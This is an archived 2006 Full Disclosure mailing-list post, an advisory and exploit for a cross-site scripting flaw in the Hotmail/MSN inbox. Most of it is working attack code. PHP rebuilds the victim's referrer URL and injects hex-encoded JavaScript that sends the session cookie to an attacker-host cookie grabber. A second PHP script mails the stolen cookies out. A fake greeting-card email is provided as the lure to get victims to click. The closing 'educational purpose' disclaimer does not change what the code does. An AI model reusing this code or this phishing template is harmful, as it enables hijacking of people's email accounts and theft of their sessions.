Full Disclosure mailing list archives
Hotmail/MSN Cookie Theft Advisory/Xploit
From: simo () morx org
Date: Sat, 25 Feb 2006 01:11:23 -0000 (GMT)
/* Hotmail/MSN Cross Site Scripting Exploit Author: Simo Ben youssef aka _6mO_HaCk Contact: Simo_at_morx_dot_org Discovered: September 15 2005 Published: February 20 2006 Vendor: MSN.com Service: Hotmail.com Webmail Service Vulnerability: Cross Site Scripting (Cookie-Theft) Severity: Medium/High Tested on: IE 6.0 (designed for) firefox 1.5 and Opera (should work on all browsers) Original Advisory/Xploit: http://www.morx.org/HotmailCookieXploit.txt Morx Security Research Team http://www.morx.org Description: Exploit written in PHP to exploit the $a variable cross site scripting vulnerability inside Hotmail/MSN inbox. Exploit requires the victim to open the email sent by the attacker and click on a URL, therefore some Social Engineering skills are required too Notice: if you dont know what's cross site scripting or/and how its being exploited then just stop reading by here as you will have to modify some things on the exploit to make it work for you, but if you insist then good luck. Exploitation: Exploiting this flaw seemed to be almost impossible on Internet Explorer Browsers, because the vulnerable variable resides inside the hotmail inbox and its value has to be correct and we cant avoid it, replace it or guess it in anyway, at this point it was ok while it was possible to get the victim click on the url and grab the entire HTTP referrer add our malicious code at the end of the variable value and redirect the victim back to the HTTP referrer with one single script, this worked just fine on firefox while it didnt work on IE beacause hotmail filters <a href=""> and replace it with javascript:ol(); so the link opens a new internet explorer window, and of course when IE opens another window it doesnt send the HTTP referrer where from the link was opened previously, so one way to exploit this was to insert an <img src=""> and make it point to a php script in order to grab the HTTP referrer of the victim, reconstruct it, add javascript code at the end of the $a variable value and then open another php script in the same server and write on it some php code to make an automatic redirection to the re constructed HTTP referrer when the victim clicks on the second link, and therefore get the malicious code executed which will grab the user authentification cookie and send it to the attacker script giving the attacker full access to the victim inbox for 24 hours, which's the default time set in hotmail for cookie expiration :) Exploiting this vulnerability can be done by uploading the following script to a php enabled webserver then send an email to the victim with <img src="http://www.attacker-server.com/a.php"> where a.php is the php exploit file name and <a href="http://http://www.attacker-server.com/ecard.php"> is the link of the second script (the one that get created by a.php) as i said some Social Engineering skills are required, so as an example the email can be sent as a greeting card with the following HTML code, you may also need to modify some things on the php exploit to make it fit your needs. Hello, </p> Jennifer has just sent you a greeting card. </p> To view your greeting card, click on the link below: </p> <a href="http://attacker-site/ecard.php"> http:// lycos.americangreetings.com/view.pd?i=197489639&m=8381&rr=y&source=lycos </a> </p> Or copy and paste the above link into your web browser's address window</p> Or enter this eCard number 9584B7E784 on our eCard Pick Up page at www.americangreetings.com</p> Thanks for using Lycos Greetings with AmericanGreetings.com <img src="http://attacker-site/a.php"></img> as a cookie grabber you may use the following code: $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $msg = "Cookie: $cookie\nIP Address: $ip"; $subject = "cookie"; mail("your () email org", $subject, $msg); header ("location: http://www.americangreetings.com/view.pd?i=405014155&m=6355&source=ag999"); at the end i would like to say a big thanks to mat (mattzew5_at_hotmail_dot_com) for helping me research and test this exploit, it took several days of research to exploit this flaw, so once again thanks mat greets to all MorX members and especially to BlooDMASK even though he refused to let me test this on his hotmail account, certainly thats because he has some nice xxx passwords on it :) also greets to barbenoir (boule7ia), th3-brain, Dragos and everybody else. Why am i publishing this late ? because i found better flaws in hotmail which i wont be releasing anytime soon :) Workaround: avoid clicking on links while being autentified. Disclaimer: this entire document is for eductional, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/Account. I cannot be held responsible for any of the above. ------------------------ Hotmail/MSN accounts XSS Xploit by Simo Ben youssef ---------------------- */ <?php /* file name of the script that's the victim will visit make sure your webserver has writting permissions otherwise create ecard.php manualy and chmod it to 777 or whatever */ $file = "ecard.php"; // get the http referrer that we get with <img $HTTP_REFERER = getenv("HTTP_REFERER"); $host = $HTTP_REFERER; // reconstruct the http referrer // get the &curmbox string position $first = strpos($host, '&curmbox'); // get the first url part based on $curmbox position $firstpart = substr($host, 0, $first); // get the second url part $secondpart = substr($host, $first); /* split the second part and list the first two variables since hotmail dublicate those sometimes */ list($a, $b, $c) = split('[&]', $secondpart); // put all the above together $target = "$firstpart&$a$b&$c"; $fo = fopen($file, 'w+'); // change this to your cookie grabber address, dont include "http://" as its already included in hex // the variable name for the cookie grabber should be included too $d = 'www.attacker-site.com/cookie-grabber.php?cookie'; // first javascript hex code $e = '%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F'; // second javascript hex code $f = '%3D%27%2B%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%2E%73%75%62%73%74%72%28%30%2C%31%39%30%30%29%3C%2F%73%63%72%69%70%74%3E'; // convert the cookie grabber url to hex code and add "%" at the first of each hex caracter $converted = bin2hex($d); $converted = chunk_split($converted, 2, '%'); $converted = '%' . substr($converted, 0, strlen($converted) - 1); $data = '<?php header ("Location: ' . $target . '' . $e . '' . $converted . '' . $f .'"); ?>'; /* write the data that would redirect the victim to the reconstructed http referrer and exploit the vulnerable variable and make the cookie redirection */ fwrite($fo, $data); fclose($fo); ?> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Hotmail/MSN Cookie Theft Advisory/Xploit simo (Feb 24)